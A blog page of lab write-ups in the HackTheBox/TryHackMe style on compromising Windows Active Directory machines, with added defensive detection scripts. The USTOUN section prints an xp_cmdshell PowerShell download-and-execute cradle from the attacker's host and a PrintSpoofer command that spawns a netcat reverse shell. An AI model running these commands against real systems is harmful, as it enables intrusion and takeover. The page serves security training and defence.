
Saturday, 17 September 2022

StreamIO HackTheBox Writeup

 


Scanning

We run nmap against the open ports with scripts and version detection, and enumerate the subdomains streamIO.htb and watch.streamIO.htb:


Enumeration

We access port 80 and find a Microsoft IIS server.

Sunday, 20 June 2021

Fusion Corp TryHackMe Writeup


Scanning

We launch nmap somewhat "aggressively" (we are in a controlled environment and can afford it :P), against all ports and with verbosity, so that ports are shown as nmap discovers them.

nmap with versions and scripts

Enumeration

We access the web service, find the corporate website and list some of the organization's users. This is great, as we could use them to brute force some exposed service.

We use the nikto tool, which discovers the directory "/backup/".

Accessing the directory, we find an office file containing the name and username of the employees.

Contents of the .ods file

We use the kerbrute tool to check which users exist; it quickly finds the user "lparker".

Exploitation

Once we have a user, we can check whether the account is AS-REP roastable and request its hash from the KDC.

We crack the hash with hashcat and the rockyou dictionary and obtain the password in clear text.
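From the defender's side, both of the steps above (the kerbrute user enumeration and the AS-REP roast) leave the same trace on the domain controller: Windows Security event 4768 (Kerberos TGT requested). The following script is an added illustration and not code from this writeup; it works on constructed sample records that reuse the field names Windows writes in 4768 (TargetUserName, IpAddress, Status, PreAuthType, TicketEncryptionType), and the enumeration threshold and window are assumptions to tune per environment. It also checks the userAccountControl bit that makes an account roastable in the first place.

```python
"""Triage of Windows Security event 4768 (Kerberos TGT requested) records.

Added illustration for the user-enumeration and AS-REP roasting steps of the
writeup; not code from the original post. All records are constructed samples.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Well-known values from the 4768 event and the userAccountControl attribute.
ERR_PRINCIPAL_UNKNOWN = "0x6"   # Result Code KDC_ERR_C_PRINCIPAL_UNKNOWN: user does not exist
RC4_HMAC = "0x17"               # Ticket Encryption Type RC4-HMAC (the crackable case)
NO_PREAUTH = "0"                # Pre-Authentication Type 0: logon without pre-authentication
DONT_REQ_PREAUTH = 0x400000     # userAccountControl bit "Do not require Kerberos preauthentication"


def _ev(time, user, ip, status, preauth, etype):
    """Build one constructed 4768 record with the relevant fields."""
    return {"time": time, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth, "TicketEncryptionType": etype}


# Constructed sample events: one scanning host (10.10.14.5) and one ordinary workstation.
EVENTS = [
    _ev("2021-06-20T10:00:01", "bob",        "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:02", "carol",      "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:02", "dave",       "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:03", "erin",       "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:03", "frank",      "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:04", "grace",      "10.10.14.5", "0x6", "-", "0xffffffff"),
    _ev("2021-06-20T10:00:09", "svc-legacy", "10.10.14.5", "0x0", "0", "0x17"),  # roastable account
    _ev("2021-06-20T10:05:30", "jsmith",     "10.10.1.20", "0x0", "2", "0x12"),  # normal pre-auth, AES256
    _ev("2021-06-20T11:15:00", "jsmtih",     "10.10.1.20", "0x6", "-", "0xffffffff"),  # single typo, benign
]

# Constructed directory entries; 4260352 = 0x410200 = DONT_REQ_PREAUTH | DONT_EXPIRE_PASSWORD | NORMAL_ACCOUNT.
ACCOUNTS = [
    {"sAMAccountName": "svc-legacy", "userAccountControl": 4260352},
    {"sAMAccountName": "jsmith", "userAccountControl": 512},
]


def find_user_enumeration(events, threshold=5, window=timedelta(minutes=5)):
    """Return {source_ip: total_unknown_user_failures} for sources that produced at
    least `threshold` KDC_ERR_C_PRINCIPAL_UNKNOWN failures inside any `window`."""
    by_ip = defaultdict(list)
    for e in events:
        if e["Status"] == ERR_PRINCIPAL_UNKNOWN:
            by_ip[e["IpAddress"]].append(datetime.fromisoformat(e["time"]))
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        # Sliding window: any `threshold` consecutive failures closer than `window`.
        for i in range(len(times) - threshold + 1):
            if times[i + threshold - 1] - times[i] <= window:
                flagged[ip] = len(times)
                break
    return flagged


def find_asrep_roasting(events):
    """Usernames that obtained a TGT without pre-authentication and with RC4,
    i.e. the reply an attacker can crack offline as described in the writeup."""
    return sorted({e["TargetUserName"] for e in events
                   if e["Status"] == "0x0"
                   and e["PreAuthType"] == NO_PREAUTH
                   and e["TicketEncryptionType"] == RC4_HMAC})


def accounts_without_preauth(entries):
    """The mitigation check: accounts whose userAccountControl has DONT_REQ_PREAUTH set."""
    return sorted(e["sAMAccountName"] for e in entries
                  if int(e["userAccountControl"]) & DONT_REQ_PREAUTH)


if __name__ == "__main__":
    print("enumeration sources:", find_user_enumeration(EVENTS))
    print("roasted accounts:", find_asrep_roasting(EVENTS))
    print("accounts without pre-auth:", accounts_without_preauth(ACCOUNTS))
```

The typo from 10.10.1.20 is deliberately left unflagged: a single 0x6 failure is normal user behaviour, which is why the detector keys on bursts per source rather than on individual failures. Clearing the DONT_REQ_PREAUTH bit on the accounts the last function lists removes the roastable condition entirely.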

Read the first flag

We do some reconnaissance and see that AV is enabled on the system, which prevents us from running some reconnaissance binaries.

Seeing that I can't find anything, I launch ldapsearch with the credentials and, by chance, find plaintext credentials in the description of the user "jmurphy".
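Credentials left in the description attribute are readable by any authenticated domain user, which is exactly why ldapsearch finds them. The audit below is an added example, not code from this writeup: it runs over constructed sample entries shaped like ldapsearch output (the account names and values are made up) and flags free-text attributes that contain a credential keyword, distinguishing a keyword followed by a value (very likely a real secret) from a keyword alone (worth a look, often an innocuous note). The keyword list and field names are assumptions to extend.

```python
"""Audit of free-text AD attributes for credential-like content.

Added example for the ldapsearch finding in the writeup; not the post's code.
The entries are constructed samples, not data from the lab.
"""
import re

# Constructed sample entries shaped like ldapsearch output (not the lab's data).
ENTRIES = [
    {"sAMAccountName": "svc-backup", "description": "Backup job account. pwd: Constructed#Value1"},
    {"sAMAccountName": "helpdesk", "description": "Password reset required at next logon"},
    {"sAMAccountName": "jdoe", "description": "Sales team, office 3B"},
    {"sAMAccountName": "svc-sql", "info": "Contraseña: EjemploConstruido2"},
]

# English and Spanish keywords that commonly precede a pasted password (assumed list).
KEYWORDS = r"(?:pass(?:word|wd)?|pwd|contrase[nñ]a|clave|secret)"
# Keyword followed by ':', '=' or 'is' and a value: the value is very likely a secret.
WITH_VALUE = re.compile(rf"\b{KEYWORDS}\b\s*(?:is|:|=)\s*(\S+)", re.IGNORECASE)
# Keyword on its own: review, but do not treat as a confirmed leak.
KEYWORD_ONLY = re.compile(rf"\b{KEYWORDS}\b", re.IGNORECASE)


def find_credential_hints(entries, fields=("description", "info", "comment")):
    """Return findings as dicts with account, field, severity and a redacted preview.

    The preview keeps only the first two characters of the suspected value so the
    report itself does not become a second copy of the secret."""
    findings = []
    for entry in entries:
        for field in fields:
            text = entry.get(field)
            if not text:
                continue
            match = WITH_VALUE.search(text)
            if match:
                value = match.group(1)
                findings.append({"account": entry["sAMAccountName"], "field": field,
                                 "severity": "high", "preview": value[:2] + "***"})
            elif KEYWORD_ONLY.search(text):
                findings.append({"account": entry["sAMAccountName"], "field": field,
                                 "severity": "review", "preview": ""})
    return findings


if __name__ == "__main__":
    for f in find_credential_hints(ENTRIES):
        print(f"{f['severity']:6} {f['account']:12} {f['field']:12} {f['preview']}")
```

Run against a real export, the entries would come from an LDAP query for objects with a non-empty description, info or comment attribute; any "high" finding should be handled as a credential rotation, not just a cleanup of the attribute, since every domain user has already been able to read it.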

Credentials evidence

We use the credentials of the new user, read the user flag and look at the privileges... Oh wow! The privilege escalation looks good ;)

Privilege Escalation

We make use of the great evil-winrm tool and this article from HackPlayers. In short, the technique abuses the backup privilege to write and restore modified ACLs as we wish.

We connect with our user and read the administrator flag.

Post-exploitation

Once we have gained access, it is time to obtain the hashes of the most relevant users.

NTLM hashes

Active Directory compromise

RDP connection


About

David Utón is a penetration tester and security auditor for web and mobile applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks.

Contact:

David-Uton @David_Uton

Sunday, 30 May 2021

USTOUN TryHackMe Writeup


Scanning

We perform a quick and aggressive scan (not recommended in real environments) to detect the open ports on the server.

Then, knowing the ports, we launch nmap against them with scripts and version detection.

Enumeration

We test whether we can authenticate as an anonymous user and see that we cannot.

Another test that I usually do in real environments is to try the "guest" user, which is usually enabled by default. As you can see in the evidence, we can use it to enumerate users by their RID.

We create a list of the most relevant users obtained and brute-force them with the "rockyou" dictionary, obtaining some credentials.

Exploitation

After several tests against different services, we find that the credentials work on the "Microsoft SQL Server" service; from here we can launch a reverse shell.

xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString("http://10.11.30.149:8000/m3.ps1")

Reverse shell connection

Privilege Escalation

We try to read the user flag, but we do not have access. We check the user's privileges and see that we could escalate by impersonating the user "Administrator" using "SeImpersonatePrivilege".

We identify the exact version of Windows installed.

We download the PrintSpoofer exploit from this github, also download netcat to the victim machine, and run the following command with a netcat listener waiting on our Kali.

.\PrintSpoofer.exe -c "C:\users\SVC-Kerb.DC01\Videos\nc.exe 10.11.30.149 444 -e cmd"

Reverse shell as Administrator
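Both escalations on this page (SeBackupPrivilege in Fusion Corp, SeImpersonatePrivilege here) start from a service account holding a privilege it should not have, so the useful defensive habit is to review which privileges service accounts actually hold. The script below is an added example and not code from this writeup: it parses the table format printed by "whoami /priv" (a constructed sample is embedded) and reports the held privileges that are on an assumed list of high-risk ones. Note that "Disabled" in that output only means the privilege is not currently enabled in the token; the process can enable it at will, so it still counts as held.

```python
"""Review of held privileges from "whoami /priv" output.

Added example for the SeBackupPrivilege and SeImpersonatePrivilege escalations in
these writeups; not code from the original posts. The sample output is constructed.
"""
import re

# Assumed list of privileges whose holders can typically reach SYSTEM or bypass ACLs.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate tokens of clients that connect to the process",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeDebugPrivilege": "open and debug any process, including SYSTEM processes",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel drivers",
}

# Constructed sample in the format printed by "whoami /priv" (not the lab's real output).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# A data row: privilege name, free-text description, then the State column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} for every data row in whoami /priv output."""
    held = {}
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match:
            held[match.group(1)] = match.group(2)
    return held


def review_privileges(text):
    """List (name, state, why it matters) for held privileges on the HIGH_RISK list.

    Disabled privileges are reported too: they are part of the token and can be
    enabled by the process, which is what the escalation tools rely on."""
    held = parse_privileges(text)
    return [(name, state, HIGH_RISK[name])
            for name, state in held.items() if name in HIGH_RISK]


if __name__ == "__main__":
    for name, state, why in review_privileges(SAMPLE_WHOAMI_PRIV):
        print(f"{name:32} {state:9} {why}")
```

For a service account the fix is usually to remove the account from the group or user-rights assignment that grants the privilege, or to run the service under a virtual or managed service account with the minimum rights the workload needs.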

And now we read the two flags.

User flag

Administrator flag
